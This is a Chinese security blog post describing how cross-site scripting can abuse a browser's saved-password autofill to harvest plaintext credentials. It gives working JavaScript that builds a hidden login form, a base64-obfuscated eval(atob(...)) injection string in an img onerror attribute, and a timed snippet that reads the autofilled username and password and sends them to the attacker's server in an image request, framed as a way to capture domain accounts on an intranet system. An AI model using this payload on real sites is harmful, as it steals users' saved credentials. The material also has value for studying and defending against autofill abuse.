本文首发于I春秋
- 我们知道在浏览器存在这样一个功能,当用户登录成功了一个网页后,浏览器会提示我们是否保存密码。如果我们点击同意,那么浏览器就会将账户及密码进行保存。
- 当我们退出账户再次访问登录页面的时候,我们会发现浏览器已经将我们保存好了的账户及密码填写到了对应的输入框内。如图。
image.png
- 那么浏览器是如何识别到这个网页并自动填充好密码的呢,首先,浏览器需要知道我们访问的这个域名是否有保存过账户及密码。然后他会去查询网页中是否有当初我们保存账户及密码时的标签ID是否相同,如果都满足,那么浏览器就会在我们访问的时候,自动的将账户及密码填充进去。
image.png
- 到这里,思路就清晰了,既然浏览器是通过域名加标签ID进行填充,那么如果我们能控制该域名下的标签ID,那么我们就有机会欺骗浏览器在我们控制的标签中填充进去账户及密码。所以我们只需要有一个XSS及可完成攻击。
- 我们来假设一个场景,我们知道在内网中有一个系统是使用域账户进行登录的,且该系统存在XSS,我们应该如何获取到他的账户和密码。
- 现在攻击成功的两个条件中我们已经满足了一个了,就是都在相同的domain下,下一步我们需要通过XSS创建一个form标签和两个input标签,并将ID设置为与登录框相同的ID。这两部完成我们就有几率获取到保存的明文账户及密码。
- 现在我们来构建一下payload
<script type="text/javascript">
document.write("<div></div>") var form_1 = document.createElement("form"); form_1.id = 'f_id';
document.getElementsByTagName('div')[0].appendChild(form_1); document.getElementById('f_id').style.display='none'; var name_1 = document.createElement("input");
var pass_1 = document.createElement("input"); name_1.type = "text"; name_1.name = "username";
name_1.id = "username" pass_1.type = "password";
pass_1.name = "password";
pass_1.id = "password"; form_1.appendChild(name_1); form_1.appendChild(pass_1);
</script>
- 通过这种方式我们就创建了一个隐藏的form框
image.png
- 这个时候我们通过xss 执行试一下效果。PS:具体实现,需要根据目标网页对代码进行微调
因为目标站点不允许跨域JS,所以我们通过eval,atob进行xss攻击,首先进行base64编码
image.png
然后构造相应的XSS代码
https://baidu.com/"</img></body><img src=x onerror=eval(atob('ZnVuY3Rpb24gY3JlYXRlX2JvZHkoKSB7CiAgZG9jdW1lbnQud3JpdGUoJzxib2R5PjwvYm9keT4nKTsKfQpmdW5jdGlvbiBjcmVhdGVfZm9ybSh1c2VyKSB7CiAgdmFyIGZvcm1fMSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2Zvcm0nKTsKICBmb3JtXzEuaWQgPSAnZl9pZCc7CiAgZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2JvZHknKVswXS5hcHBlbmRDaGlsZChmb3JtXzEpOwogIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdmX2lkJykuc3R5bGUuZGlzcGxheT0nbm9uZSc7CiAgdmFyIG5hbWVfMSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2lucHV0Jyk7CiAgdmFyIHBhc3NfMSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2lucHV0Jyk7CiAgbmFtZV8xLnR5cGUgPSAndGV4dCc7CiAgbmFtZV8xLm5hbWUgPSAndXNlcm5hbWUnOwogIG5hbWVfMS5pZCA9ICd1c2VybmFtZScKICBwYXNzXzEudHlwZSA9ICdwYXNzd29yZCc7CiAgcGFzc18xLm5hbWUgPSAncGFzc3dvcmQnOwogIHBhc3NfMS5pZCA9ICdwYXNzd29yZCc7CiAgZm9ybV8xLmFwcGVuZENoaWxkKG5hbWVfMSk7CiAgZm9ybV8xLmFwcGVuZENoaWxkKHBhc3NfMSk7Cn0KY3JlYXRlX2Zvcm0oJycpOw=='))></pre>
- 可以看到,成功插入了form框
image.png
-
我们直接在console 查看是否填充了账户和密码,成功获取到了账户和密码。
image.png
-
这个时候,我们就只需要添加JS代码让它 去自动获取账户和密码,然后发送到我们的服务器就可以了。使用setTimeout是为了让浏览器填充完毕才发送账户和密码。(截止今天Chrome似乎已经无法通过这种方式获取,Firefox目前任然可以。)
setTimeout(function () {
username = document.getElementById('login_username').value;
password = document.getElementById('login_password').value;
if (username.length > 0) {
var newimg = new Image();
newimg.src = 'http://127.0.0.1:8081/?username=' + username + '&password=' + password;
} }, 2000);
-
账户密码已成功接收。(这个是几个月前的一次测试中利用到的攻击手法,当时几乎所有浏览器都受影响,现目前只测试了Chrome和Firefox,Chrome已不受影响。)
image.png
网友评论